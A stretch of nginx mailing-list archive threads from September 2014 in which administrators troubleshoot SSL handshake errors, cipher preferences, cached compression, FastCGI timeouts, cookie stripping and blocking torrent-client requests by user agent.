From nginx-forum at nginx.us Mon Sep 1 06:20:05 2014 From: nginx-forum at nginx.us (lpugoy) Date: Mon, 01 Sep 2014 02:20:05 -0400 Subject: Significant increase in number of connections after renewing SSL certificate Message-ID: <556c0af5b1861c3055089e30322e7e5f.NginxMailingListEnglish@forum.nginx.org> Hello. We recently renewed our SSL certificate. After reloading nginx, the number of connections increased significantly even though the number of requests remained the same. Looking at the debug log, there are a lot of entries similar to the following:

accept: 153.185.223.172:59011 fd:5
event timer add: 5: 60000:1409550689995
reusable connection: 1
epoll add event: fd:5 op:1 ev:80002001
post event 00007FF5AB84F280
delete posted event 00007FF5AB84F280
http check ssl handshake
http recv(): 1
https ssl handshake: 0x80
SSL_do_handshake: -1
SSL_get_error: 2
reusable connection: 0
post event 00007FF5AB84F280
delete posted event 00007FF5AB84F280
SSL handshake handler: 0
SSL_do_handshake: 0
SSL_get_error: 1
SSL_do_handshake() failed (SSL: error:1409441B:SSL routines:SSL3_READ_BYTES:tlsv1 alert decrypt error:SSL alert number 51) while SSL handshaking, client: 153.185.223.172, server: 0.0.0.0:443
close http connection: 5
SSL_shutdown: 1
event timer del: 5: 1409550689995
reusable connection: 0
free: 0000000001DE0DF0, unused: 0
free: 0000000001E15510, unused: 136

Our SSL certificate is a Positive SSL Wildcard from Comodo.
Output of nginx -V: nginx version: openresty/1.7.2.1 built by gcc 4.6.3 (Ubuntu/Linaro 4.6.3-1ubuntu5) TLS SNI support enabled configure arguments: --prefix=/usr/local/openresty/nginx --with-debug --with-cc-opt='-DNGX_LUA_USE_ASSERT -DNGX_LUA_ABORT_AT_PANIC' --add-module=../ngx_devel_kit-0.2.19 --add-module=../echo-nginx-module-0.54 --add-module=../xss-nginx-module-0.04 --add-module=../ngx_coolkit-0.2rc1 --add-module=../set-misc-nginx-module-0.24 --add-module=../form-input-nginx-module-0.09 --add-module=../encrypted-session-nginx-module-0.03 --add-module=../srcache-nginx-module-0.28 --add-module=../ngx_lua-0.9.10 --add-module=../ngx_lua_upstream-0.02 --add-module=../headers-more-nginx-module-0.25 --add-module=../array-var-nginx-module-0.03 --add-module=../memc-nginx-module-0.15 --add-module=../redis2-nginx-module-0.11 --add-module=../redis-nginx-module-0.3.7 --add-module=../rds-json-nginx-module-0.13 --add-module=../rds-csv-nginx-module-0.05 --with-ld-opt=-Wl,-rpath,/usr/local/openresty/luajit/lib --with-http_stub_status_module --with-http_ssl_module Link to the debug log, with some lines removed for privacy: http://goo.gl/xsJfNz. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,252972,252972#msg-252972 From luky-37 at hotmail.com Mon Sep 1 06:39:43 2014 From: luky-37 at hotmail.com (Lukas Tribus) Date: Mon, 1 Sep 2014 08:39:43 +0200 Subject: Significant increase in number of connections after renewing SSL certificate In-Reply-To: <556c0af5b1861c3055089e30322e7e5f.NginxMailingListEnglish@forum.nginx.org> References: <556c0af5b1861c3055089e30322e7e5f.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hi, > Hello. We recently renewed our SSL certificate. After reloading nginx the > number of connections increased significantly even if the number of requests > remained the same. Does ssltest [1] show any chain issues? Any other warnings from that report? 
Regards, Lukas [1] https://www.ssllabs.com/ssltest/ From nginx-forum at nginx.us Mon Sep 1 07:04:56 2014 From: nginx-forum at nginx.us (lpugoy) Date: Mon, 01 Sep 2014 03:04:56 -0400 Subject: Significant increase in number of connections after renewing SSL certificate In-Reply-To: References: Message-ID: <98923802a826e639acf2acb3dba49294.NginxMailingListEnglish@forum.nginx.org> Hello. No, our site's grade is A. Our server is still processing requests correctly, so some of the requests succeed but most have an SSL error. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,252972,252974#msg-252974 From luky-37 at hotmail.com Mon Sep 1 07:10:51 2014 From: luky-37 at hotmail.com (Lukas Tribus) Date: Mon, 1 Sep 2014 09:10:51 +0200 Subject: Significant increase in number of connections after renewing SSL certificate In-Reply-To: <98923802a826e639acf2acb3dba49294.NginxMailingListEnglish@forum.nginx.org> References: , <98923802a826e639acf2acb3dba49294.NginxMailingListEnglish@forum.nginx.org> Message-ID: > Hello. > > No, our site's grade is A. Grade is irrelevant. Does it have chain issues or not (read: does ssltest report "chain issues: none")? From nginx-forum at nginx.us Mon Sep 1 07:11:26 2014 From: nginx-forum at nginx.us (lpugoy) Date: Mon, 01 Sep 2014 03:11:26 -0400 Subject: Significant increase in number of connections after renewing SSL certificate In-Reply-To: <98923802a826e639acf2acb3dba49294.NginxMailingListEnglish@forum.nginx.org> References: <98923802a826e639acf2acb3dba49294.NginxMailingListEnglish@forum.nginx.org> Message-ID: <17a3fbd07fc675e40db5ea2c4a2d620e.NginxMailingListEnglish@forum.nginx.org> To add more information, we have the chain issue "Chain issues: Contains anchor". But removing it does not help. 
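A note on the "Chain issues: Contains anchor" finding mentioned below: it means the certificate file served to clients includes the root ("anchor") certificate, which clients already carry in their own trust stores. The usual fix is to serve only the leaf certificate plus the intermediates. A minimal sketch (file paths are hypothetical):

```nginx
# example.com.chained.crt should contain the server (leaf) certificate
# first, followed by the intermediate CA certificate(s), and NOT the
# self-signed root -- browsers supply the root themselves.
ssl_certificate     /etc/nginx/ssl/example.com.chained.crt;
ssl_certificate_key /etc/nginx/ssl/example.com.key;
```

Serving the anchor is mostly harmless (it only wastes handshake bytes), which is consistent with the poster's observation that removing it did not change the behaviour.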
Some more details: https://prtsc.io/g4QVsY3PUY https://prtsc.io/FmMCjDao4p https://prtsc.io/WZksyPXucM Posted at Nginx Forum: http://forum.nginx.org/read.php?2,252972,252975#msg-252975 From dewanggaba at xtremenitro.org Mon Sep 1 07:14:54 2014 From: dewanggaba at xtremenitro.org (Dewangga) Date: Mon, 01 Sep 2014 14:14:54 +0700 Subject: Significant increase in number of connections after renewing SSL certificate In-Reply-To: <17a3fbd07fc675e40db5ea2c4a2d620e.NginxMailingListEnglish@forum.nginx.org> References: <98923802a826e639acf2acb3dba49294.NginxMailingListEnglish@forum.nginx.org> <17a3fbd07fc675e40db5ea2c4a2d620e.NginxMailingListEnglish@forum.nginx.org> Message-ID: <54041CEE.2050209@xtremenitro.org> Hi, What kind of ciphers do you use? Could you paste your ciphers configuration there? On 9/1/2014 14:11, lpugoy wrote: > To add more information, we have the chain issue "Chain issues: > Contains anchor". But removing it does not help. > > Some more details: https://prtsc.io/g4QVsY3PUY > https://prtsc.io/FmMCjDao4p https://prtsc.io/WZksyPXucM > > Posted at Nginx Forum: > http://forum.nginx.org/read.php?2,252972,252975#msg-252975 > > _______________________________________________ nginx mailing list > nginx at nginx.org http://mailman.nginx.org/mailman/listinfo/nginx > From nginx-forum at nginx.us Mon Sep 1 07:20:10 2014 From: nginx-forum at nginx.us (lpugoy) Date: Mon, 01 Sep 2014 03:20:10 -0400 Subject: Significant increase in number of
connections after renewing SSL certificate In-Reply-To: <54041CEE.2050209@xtremenitro.org> References: <54041CEE.2050209@xtremenitro.org> Message-ID: > What kind of ciphers do you use? Could you paste your ciphers > configuration there?

ssl_protocols TLSv1 TLSv1.1 TLSv1.2;
ssl_prefer_server_ciphers on;
ssl_ciphers "EECDH+ECDSA+AESGCM EECDH+aRSA+AESGCM EECDH+ECDSA+SHA384 EECDH+ECDSA+SHA256 EECDH+aRSA+SHA384 EECDH+aRSA+SHA256 EECDH+aRSA+RC4 EECDH EDH+aRSA RC4 !aNULL !eNULL !LOW !3DES !MD5 !EXP !PSK !SRP !DSS";

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,252972,252978#msg-252978 From nginx-forum at nginx.us Mon Sep 1 07:20:23 2014 From: nginx-forum at nginx.us (nginxsantos) Date: Mon, 01 Sep 2014 03:20:23 -0400 Subject: Compression with Caching In-Reply-To: <704135653fae52d961b4a0d543d4c7c3.NginxMailingListEnglish@forum.nginx.org> References: <704135653fae52d961b4a0d543d4c7c3.NginxMailingListEnglish@forum.nginx.org> Message-ID: Any thoughts on this? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,252885,252979#msg-252979 From mdounin at mdounin.ru Mon Sep 1 09:41:32 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 1 Sep 2014 13:41:32 +0400 Subject: Compression with Caching In-Reply-To: References: <704135653fae52d961b4a0d543d4c7c3.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20140901094132.GU1849@mdounin.ru> Hello! On Mon, Sep 01, 2014 at 03:20:23AM -0400, nginxsantos wrote: > Any thoughts on this? As you already found out, nginx stores responses as got from the backend server. If you want to store compressed responses - they have to be returned compressed by the upstream. If your upstream server doesn't do this - you can add an additional proxy layer (e.g., in the same nginx instance) to do this.
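The two-layer setup described here can be sketched in a single nginx instance. Everything below (ports, the `backend` upstream name, the `cache_zone` cache) is hypothetical and assumes a matching `proxy_cache_path` and `upstream` block exist elsewhere in the configuration:

```nginx
# Front server: caches what it receives from the internal layer,
# so responses are stored in the cache already compressed.
server {
    listen 80;
    location / {
        proxy_cache       cache_zone;            # zone from proxy_cache_path
        proxy_set_header  Accept-Encoding gzip;  # always ask the inner layer for gzip
        proxy_pass        http://127.0.0.1:8080;
        gunzip            on;                    # re-inflate for clients without gzip support
    }
}

# Internal compression layer: gzips the backend's plain responses.
server {
    listen 127.0.0.1:8080;
    location / {
        gzip              on;
        gzip_http_version 1.0;   # proxied requests arrive as HTTP/1.0 by default
        gzip_proxied      any;
        gzip_types        text/plain text/css application/json;
        proxy_pass        http://backend;        # the real upstream
    }
}
```

The `gunzip on;` directive on the front server is what handles the caveat raised in the next paragraph: it decompresses cached gzipped bodies for clients that do not advertise gzip support.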
Note though, that if you'll store compressed responses in the cache, you'll have to take care of uncompressing them as appropriate for clients which don't support compression (gunzip module can do this, see http://nginx.org/r/gunzip). -- Maxim Dounin http://nginx.org/ From braulio at eita.org.br Mon Sep 1 12:06:40 2014 From: braulio at eita.org.br (=?UTF-8?Q?Br=C3=A1ulio_Bhavamitra?=) Date: Mon, 1 Sep 2014 09:06:40 -0300 Subject: Compression with Caching In-Reply-To: <20140901094132.GU1849@mdounin.ru> References: <704135653fae52d961b4a0d543d4c7c3.NginxMailingListEnglish@forum.nginx.org> <20140901094132.GU1849@mdounin.ru> Message-ID: Maxim, is there a roadmap for ETags? I really miss that on nginx... On Mon, Sep 1, 2014 at 6:41 AM, Maxim Dounin wrote: > Hello! > > On Mon, Sep 01, 2014 at 03:20:23AM -0400, nginxsantos wrote: > > > Any thoughts on this? > > As you already found out, nginx stores responses as got from the > backend server. If you want to store compressed responses - they > have to be returned compressed by the upstream. If your upstream > server doesn't do this - you can add an additional proxy layer > (e.g., in the same nginx instance) to do this. > > Note though, that if you'll store compressed responses in the > cache, you'll have to take care of uncompressing them as > appropriate for clients which don't support compression (gunzip > module can do this, see http://nginx.org/r/gunzip). > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -- "Fight for your ideology. Be one with your ideology. Live for your ideology. Die for your ideology." P.R. Sarkar EITA - Educação, Informação e Tecnologias para Autogestão http://cirandas.net/brauliobo http://eita.org.br "Paramapurusha is my father and Parama Prakriti is my mother. The universe is my home and all of us are citizens of this cosmos. This universe is the imagination of the Macrocosmic Mind, and all entities are being created, preserved and destroyed in the phases of extroversion and introversion of the cosmic imaginative flow. On the personal level, when a person imagines something in their mind, at that moment that person is the sole owner of what they imagine, and nobody else. When a mentally created human being walks through an equally imagined cornfield, the imagined person is not the property of that cornfield, for it belongs to the individual who is imagining it. This universe was created in the imagination of Brahma, the Supreme Entity, so the ownership of this universe belongs to Brahma, and not to the microcosms that were also created by Brahma's imagination. No property of this world, mutable or immutable, belongs to any particular individual; everything is the common patrimony of all." Rest of the (Portuguese) text at http://cirandas.net/brauliobo/blog/a-problematica-de-hoje-em-dia -------------- next part -------------- An HTML attachment was scrubbed... URL: From r at roze.lv Mon Sep 1 12:18:18 2014 From: r at roze.lv (Reinis Rozitis) Date: Mon, 1 Sep 2014 15:18:18 +0300 Subject: Compression with Caching In-Reply-To: References: <704135653fae52d961b4a0d543d4c7c3.NginxMailingListEnglish@forum.nginx.org> <20140901094132.GU1849@mdounin.ru> Message-ID: > is there a roadmap for ETags? I really miss that on nginx... What do you mean by that? http://nginx.org/en/docs/http/ngx_http_core_module.html#etag on by default since 1.3.3. rr From patrick at laimbock.com Mon Sep 1 12:24:19 2014 From: patrick at laimbock.com (Patrick Laimbock) Date: Mon, 01 Sep 2014 14:24:19 +0200 Subject: Compression with Caching In-Reply-To: References: <704135653fae52d961b4a0d543d4c7c3.NginxMailingListEnglish@forum.nginx.org> <20140901094132.GU1849@mdounin.ru> Message-ID: <54046573.6080402@laimbock.com> On 01-09-14 14:18, Reinis Rozitis wrote: >> is there a roadmap for ETags? I really miss that on nginx... > > What do you mean by that?
> > http://nginx.org/en/docs/http/ngx_http_core_module.html#etag on by > default since 1.3.3. And from http://nginx.org/en/CHANGES Changes with nginx 1.7.3 08 Jul 2014 *) Feature: weak entity tags are now preserved on response modifications, and strong ones are changed to weak. HTH, Patrick From braulio at eita.org.br Mon Sep 1 12:33:42 2014 From: braulio at eita.org.br (=?UTF-8?Q?Br=C3=A1ulio_Bhavamitra?=) Date: Mon, 1 Sep 2014 09:33:42 -0300 Subject: Compression with Caching In-Reply-To: <54046573.6080402@laimbock.com> References: <704135653fae52d961b4a0d543d4c7c3.NginxMailingListEnglish@forum.nginx.org> <20140901094132.GU1849@mdounin.ru> <54046573.6080402@laimbock.com> Message-ID: Thanks Patrick, I meant weak etags, happy to see them on 1.7.3! On Mon, Sep 1, 2014 at 9:24 AM, Patrick Laimbock wrote: > On 01-09-14 14:18, Reinis Rozitis wrote: > >> is there a roadmap for ETags? I really miss that on nginx... >>> >> >> What do you mean by that? >> >> http://nginx.org/en/docs/http/ngx_http_core_module.html#etag on by >> default since 1.3.3. >> > > And from http://nginx.org/en/CHANGES > > Changes with nginx 1.7.3 08 Jul 2014 > > *) Feature: weak entity tags are now preserved on response > modifications, and strong ones are changed to weak. > > > HTH, > Patrick > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From reallfqq-nginx at yahoo.fr Mon Sep 1 14:56:00 2014 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Mon, 1 Sep 2014 16:56:00 +0200 Subject: SSL ciphers preference Message-ID: Hello, I filed a (now closed, because erroneous) enhancement ticket: http://trac.nginx.org/nginx/ticket/619 As it appears, the change I noticed in the SSL test did not result from my malformed ciphers list. Right about that. However, what is intriguing is the answer Maxim gave me on the second part of my proposal: the default activation of ssl_prefer_server_ciphers . He said that turning this option on made sense with a custom list but not with the default one. I confirm that the results of my tests changed. It was not because of the ciphers list, but it was due to that other change. Thus, the ciphers used by the emulated clients of the test changed following the activation of that option, allowing me to pass the 'Forward Secrecy' part of the test, resulting in an upgrade of my score from A- to A. I just checked it again, removing my buggy ciphers list and (de)activating the 'prefer' option.
If using that option with the default ciphers list was useless, why did that change have an impact on the results of my test? --- *B. R.* -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Mon Sep 1 18:05:46 2014 From: nginx-forum at nginx.us (manish-ezest) Date: Mon, 01 Sep 2014 14:05:46 -0400 Subject: NGINX redirection issue In-Reply-To: <20140831024541.GS1849@mdounin.ru> References: <20140831024541.GS1849@mdounin.ru> Message-ID: Hello Maxim, As you suggested, I have set "recursive_error_pages" to off, but I am still facing the problem. This time I am getting a "504 Gateway Time-out" error. I have already shared my NGINX and vhost configuration. We have one fastcgi script running for serving error pages, which checks for an entry in the sample.xml file (it contains URLs) and redirects the link to a particular location. If it doesn't find any page then it returns a 404 page. I am pasting the log file of the fastcgi script as well.

==> fastcgi-404.log <==
[2014-09-01T15:45:24] Got request for [/bbb/ccc/index.html] on host [www.aaa.com]
[2014-09-01T15:45:24] Target not found in sample.xml, importing default 404 [/bbb/fff/error_404.html]
[2014-09-01T15:45:24] Retrieving target [http://www.aaa.com/bbb/fff/error_404.html]

==> www.aaa.com-error.log <==
2014/09/01 15:45:34 [error] 15900#0: *175 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 11.11.11.11, server: www.aaa.com, request: "GET /bbb/ccc/index.html HTTP/1.1", upstream: "fastcgi://127.0.0.1:8999", host: "www.aaa.com"
2014/09/01 15:45:34 [error] 15900#0: *175 open() "/www/favicon.ico" failed (2: No such file or directory), client: 11.11.11.11, server: www.aaa.com, request: "GET /favicon.ico HTTP/1.1", host: "www.aaa.com"
2014/09/01 15:45:44 [error] 15900#0: *175 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 11.11.11.11, server: www.aaa.com, request: "GET /favicon.ico HTTP/1.1",
upstream: "fastcgi://127.0.0.1:8999", host: "www.aaa.com" 2014/09/01 15:46:57 [error] 15900#0: *178 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 11.11.11.11, server: www.aaa.com, request: "GET /bbb/ccc/index.html HTTP/1.1", upstream: "fastcgi://127.0.0.1:8999", host: "www.aaa.com" 2014/09/01 15:46:57 [error] 15900#0: *178 open() "/www/favicon.ico" failed (2: No such file or directory), client: 11.11.11.11, server: www.aaa.com, request: "GET /favicon.ico HTTP/1.1", host: "www.aaa.com" 2014/09/01 15:47:07 [error] 15900#0: *178 upstream timed out (110: Connection timed out) while reading response header from upstream, client: 11.11.11.11, server: www.aaa.com, request: "GET /favicon.ico HTTP/1.1", upstream: "fastcgi://127.0.0.1:8999", host: "www.aaa.com" --Manish Posted at Nginx Forum: http://forum.nginx.org/read.php?2,252379,252998#msg-252998 From mdounin at mdounin.ru Mon Sep 1 18:07:29 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Mon, 1 Sep 2014 22:07:29 +0400 Subject: SSL ciphers preference In-Reply-To: References: Message-ID: <20140901180729.GD1849@mdounin.ru> Hello! On Mon, Sep 01, 2014 at 04:56:00PM +0200, B.R. wrote: > Hello, > > I filled a (now closed, because erroneous) enhancement ticket: > http://trac.nginx.org/nginx/ticket/619 > > As it appears, the change I noticed in the SSl test did not result from my > malformed ciphers list. > Right about that. > > However, what is intriguing is the answer Maxim gave me on the second part > of my proposal: the default activation of ssl_prefer_server_ciphers > > . > > He saif that this option put to on made sense with a custome list but not > with the default one. > > I confirm that the results of my tests changed. It was no because of the > ciphers list, but it was due to that other change. 
> Thus, the ciphers used by the emulated clients of the test changed > following the activation of that option, allowing me to pass the 'Forward > Secrecy' part of the test, resulting in an upgrade of my score from A- to A. > > I jsut checked it again, removing my buggy ciphers list and (de)activating > de rprefer' option. > > If using that option with the default ciphers list was useless, what had > that change an impact on the results of my test? Switching on or off ssl_prefer_server_ciphers obviously may change score as reported by SSL Labs, since it can (and likely will) change ciphers negotiated in some cases. But it's usually not a good idea to switch it on unless you understand the results and have a good reason to do so. By default, OpenSSL sorts ciphers per symmetric encryption strength, and prefers ciphers with forward secrecy if strength is identical. As a result you may get better forward secrecy support if you'll switch on ssl_prefer_server_ciphers - or not, depending on actual ciphers supported by clients. E.g., AES256-SHA will be preferred over ECDHE-RSA-AES128-SHA, which is probably not what you want. Another example: DHE-RSA-AES256-SHA256 will be preferred over ECDHE-RSA-AES128-SHA256. On the other hand, you probably don't want DHE to be used at all for performance reasons. -- Maxim Dounin http://nginx.org/ From reallfqq-nginx at yahoo.fr Mon Sep 1 18:35:10 2014 From: reallfqq-nginx at yahoo.fr (B.R.) Date: Mon, 1 Sep 2014 20:35:10 +0200 Subject: SSL ciphers preference In-Reply-To: <20140901180729.GD1849@mdounin.ru> References: <20140901180729.GD1849@mdounin.ru> Message-ID: Loud and clear. I am no expert on OpenSSL cipher suites. I found a resource on their own website that might prove useful. At least, it is a start towards understanding what you are doing... Thanks! --- *B. R.* On Mon, Sep 1, 2014 at 8:07 PM, Maxim Dounin wrote: > Hello! > > On Mon, Sep 01, 2014 at 04:56:00PM +0200, B.R.
wrote: > > > Hello, > > > > I filled a (now closed, because erroneous) enhancement ticket: > > http://trac.nginx.org/nginx/ticket/619 > > > > As it appears, the change I noticed in the SSl test did not result from > my > > malformed ciphers list. > > Right about that. > > > > However, what is intriguing is the answer Maxim gave me on the second > part > > of my proposal: the default activation of ssl_prefer_server_ciphers > > < > http://nginx.org/en/docs/http/ngx_http_ssl_module.html#ssl_prefer_server_ciphers > > > > . > > > > He saif that this option put to on made sense with a custome list but not > > with the default one. > > > > I confirm that the results of my tests changed. It was no because of the > > ciphers list, but it was due to that other change. > > Thus, the ciphers used by the emulated clients of the test changed > > following the activation of that option, allowing me to pass the 'Forward > > Secrecy' part of the test, resulting in an upgrade of my score from A- > to A. > > > > I jsut checked it again, removing my buggy ciphers list and > (de)activating > > de rprefer' option. > > > > If using that option with the default ciphers list was useless, what had > > that change an impact on the results of my test? > > Switching on or off ssl_prefer_server_ciphers obviously may change > score as reported by SSL Labs, since it can (and likely will) > change ciphers negotiated in some cases. But it's usually not > a good idea to switch it on unless you understand the results and > have a good reason to do so. > > By default, OpenSSL sorts ciphers per symmetric encryption > strength, and prefers ciphers with forward secrecy if strength is > identical. As a result you may get better forward secrecy support > if you'll switch on ssl_prefer_server_ciphers - or not, depending > on actual ciphers supported by clients. E.g., AES256-SHA will be > preferred over ECDHE-RSA-AES128-SHA, which is probably not what > you want. 
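Maxim's point about ordering can be made concrete: with `ssl_prefer_server_ciphers on`, the server's own list decides the negotiated suite, so forward-secrecy suites only win if they are listed first. A sketch (the cipher names are illustrative only, not a vetted recommendation):

```nginx
# With the server's preference in force, the ORDER below is what
# matters: ECDHE (forward-secrecy) suites are placed ahead of the
# plain-RSA ones, so capable clients get forward secrecy even if
# their own preference order differs.
ssl_prefer_server_ciphers on;
ssl_ciphers "ECDHE-RSA-AES128-GCM-SHA256:ECDHE-RSA-AES256-SHA384:AES128-GCM-SHA256:AES256-SHA:!aNULL:!MD5";
```

With the option off, the client's order wins instead, which is why toggling it changed which suites the SSL Labs emulated clients negotiated.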
> > Another example: DHE-RSA-AES256-SHA256 will be preferred over > ECDHE-RSA-AES128-SHA256. On the other hand, you probably > don't want DHE to be used at all for performance reasons. > > -- > Maxim Dounin > http://nginx.org/ > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Mon Sep 1 21:25:56 2014 From: nginx-forum at nginx.us (erankor2) Date: Mon, 01 Sep 2014 17:25:56 -0400 Subject: terminate a connection after sending headers Message-ID: Hi all, In the module I'm developing, I have the possibility of encountering an error after the response headers were already sent. As the headers were already sent (with status 200) the only way for me to signal the error to the client would be to close the connection. I tried calling ngx_http_finalize_request with both NGX_ERROR and NGX_HTTP_CLOSE and the connection is not closed. After debugging it, I found it has to do with the 'if (mr->write_event_handler)' in ngx_http_terminate_request. I'm not sure what is the purpose of this if, but in my case write_event_handler has the value ngx_http_request_empty_handler, so the if evaluates to true and the connection is not terminated. When I forcefully change write_event_handler to NULL with GDB, I see the connection is closed as expected. I searched the code for 'write_event_handler =' and could not find a single place where this member gets a value of NULL (it always gets a pointer to some function). Can anyone confirm if this is really a bug ? maybe the if should be updated to 'if (mr->write_event_handler != ngx_http_request_empty_handler)' ? 
Thank you, Eran Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253006,253006#msg-253006 From nginx-forum at nginx.us Tue Sep 2 07:12:11 2014 From: nginx-forum at nginx.us (nginxsantos) Date: Tue, 02 Sep 2014 03:12:11 -0400 Subject: Compression with Caching In-Reply-To: <20140901094132.GU1849@mdounin.ru> References: <20140901094132.GU1849@mdounin.ru> Message-ID: <8f64898850349e84fd7d4cc12b589e54.NginxMailingListEnglish@forum.nginx.org> Thanks.... I am not sure why we don't first compress and then store the same in the cache. In this way, we don't have to compress the content each time (if the client is asking for gzipped content) before sending it to the client. I am not able to understand why it is currently designed this way. Posted at Nginx Forum: http://forum.nginx.org/read.php?2,252885,253009#msg-253009 From nginx-forum at nginx.us Tue Sep 2 08:59:05 2014 From: nginx-forum at nginx.us (laszlo) Date: Tue, 02 Sep 2014 04:59:05 -0400 Subject: redirect only every 2nd or 3rd request Message-ID: <3f758f688a1c9e13f7c769a6d981774a.NginxMailingListEnglish@forum.nginx.org> I'm trying to set up a rule which is going to redirect only every second or third request, and only if the URL contains a specific string. I already did the redirect based on a string in the URL, but I can't find how to redirect only every second or third request:

if ($request_uri ~ .*.WHATEVER_STRING.*) {
    if (this is the 2nd request, then) {
        rewrite ^/(.*) WHATEVER_URL;
    }
}

Posted at Nginx Forum: http://forum.nginx.org/read.php?2,253011,253011#msg-253011 From nginx-forum at nginx.us Tue Sep 2 10:16:42 2014 From: nginx-forum at nginx.us (gthb) Date: Tue, 02 Sep 2014 06:16:42 -0400 Subject: Hide a request cookie in proxy_pass In-Reply-To: <20140829172725.GQ1849@mdounin.ru> References: <20140829172725.GQ1849@mdounin.ru> Message-ID: Yep, works like a charm, thank you!
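On laszlo's every-second-or-third-request question above: nginx keeps no per-request counter, but `split_clients` can approximate the ratio statistically. A sketch (the match string, target URL and percentage are hypothetical placeholders):

```nginx
# http context: split_clients hashes the key into buckets, so ~33% of
# requests land in the redirect bucket. This is statistical, not a
# strict "every third request" counter.
split_clients "${remote_addr}${msec}" $roll {
    33%  1;
    *    "";
}

server {
    location / {
        set $do_redirect "";
        # redirect only when BOTH the URL matches and the roll hit
        if ($request_uri ~ WHATEVER_STRING) { set $do_redirect "$roll"; }
        if ($do_redirect)                   { rewrite ^/(.*) http://example.com/target redirect; }
    }
}
```

The two consecutive `if` blocks are needed because the rewrite module does not allow nesting them.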
And two consecutive ifs to strip two cookies work as well:

set $stripped_cookie $http_cookie;

if ($http_cookie ~ "(.*)(?:^|;)\s*sessionid=[^;]+(.*)$") {
    set $stripped_cookie $1$2;
}

if ($stripped_cookie ~ "(.*)(?:^|;)\s*csrftoken=[^;]+(.*)$") {
    set $stripped_cookie $1$2;
}

Cheers, Gulli Posted at Nginx Forum: http://forum.nginx.org/read.php?2,252944,253012#msg-253012 From neutrino8 at gmail.com Tue Sep 2 11:08:03 2014 From: neutrino8 at gmail.com (Grozdan) Date: Tue, 2 Sep 2014 13:08:03 +0200 Subject: Deny certain words Message-ID: Hi, Somehow my server gets hit by torrent requests which look like this: GET /?info_hash=..... after the = come long strings of seemingly random hashes torrent clients are looking for. I'd like to deny all such requests, so I'd appreciate it if someone could show me how to deny everything from (and including) ?info_hash= I've looked all over the net at similar examples but all I tried thus far didn't work Thanks :) -- Yours truly From lists-nginx at swsystem.co.uk Tue Sep 2 11:17:12 2014 From: lists-nginx at swsystem.co.uk (Steve Wilson) Date: Tue, 02 Sep 2014 12:17:12 +0100 Subject: Deny certain words In-Reply-To: References: Message-ID: Torrent clients normally have their own user agent; I had a need a while back to block some, for which we used the magic 444 to kill the connection.

if ($http_user_agent ~* (uTorrent|Transmission) ) {
    return 444;
    break;
}

On 02/09/2014 12:08, Grozdan wrote: > Hi, > > Somehow my server gets hit by torrent requests which look like this: > > GET /?info_hash=..... > > after the = come long strings of seemingly random hashes torrent > clients are looking for.
> > I'd like to deny all such requests so would like if someone could > provide me how to deny everything (and including) ?info_hash= > > I've looked all over the net at similar examples but all I tried thus > far didn't work > > Thanks :) From neutrino8 at gmail.com Tue Sep 2 11:32:51 2014 From: neutrino8 at gmail.com (Grozdan) Date: Tue, 2 Sep 2014 13:32:51 +0200 Subject: Deny certain words In-Reply-To: References: Message-ID: On Tue, Sep 2, 2014 at 1:17 PM, Steve Wilson wrote: > Torrent clients have their own user agent normally, I had a need a while > back to block some which we used the magic 444 to kill it. > > if ($http_user_agent ~* (uTorrent|Transmission) ) { > return 444; > break; > > } Thanks. That seems to work here :) > > On 02/09/2014 12:08, Grozdan wrote: >> >> Hi, >> >> Somehow my server gets hit by torrent requests which look like this: >> >> GET /?info_hash=..... >> >> after the = come long strings of seemingly random hashes torrent >> clients are looking for. >> >> I'd like to deny all such requests so would like if someone could >> provide me how to deny everything (and including) ?info_hash= >> >> I've looked all over the net at similar examples but all I tried thus >> far didn't work >> >> Thanks :) > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -- Yours truly From mdounin at mdounin.ru Tue Sep 2 13:09:03 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 2 Sep 2014 17:09:03 +0400 Subject: terminate a connection after sending headers In-Reply-To: References: Message-ID: <20140902130903.GI1849@mdounin.ru> Hello! On Mon, Sep 01, 2014 at 05:25:56PM -0400, erankor2 wrote: > Hi all, > > In the module I'm developing, I have the possibility of encountering an > error after the response headers were already sent. 
As the headers were > already sent (with status 200) the only way for me to signal the error to > the client would be to close the connection. I tried calling > ngx_http_finalize_request with both NGX_ERROR and NGX_HTTP_CLOSE and the > connection is not closed. > After debugging it, I found it has to do with the 'if > (mr->write_event_handler)' in ngx_http_terminate_request. I'm not sure what > is the purpose of this if, but in my case write_event_handler has the value > ngx_http_request_empty_handler, so the if evaluates to true and the > connection is not terminated. When I forcefully change write_event_handler > to NULL with GDB, I see the connection is closed as expected. > I searched the code for 'write_event_handler =' and could not find a single > place where this member gets a value of NULL (it always gets a pointer to > some function). The r->write_event_handler is set to NULL on initial creation of a request. If write_event_handler is not NULL during a request termination, nginx posts an event instead of freeing the request directly (this is done to avoid use-after-free when processing posted subrequests). The request is still freed though. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Tue Sep 2 13:09:55 2014 From: mdounin at mdounin.ru (Maxim Dounin) Date: Tue, 2 Sep 2014 17:09:55 +0400 Subject: Deny certain words In-Reply-To: References: Message-ID: <20140902130955.GJ1849@mdounin.ru> Hello! On Tue, Sep 02, 2014 at 12:17:12PM +0100, Steve Wilson 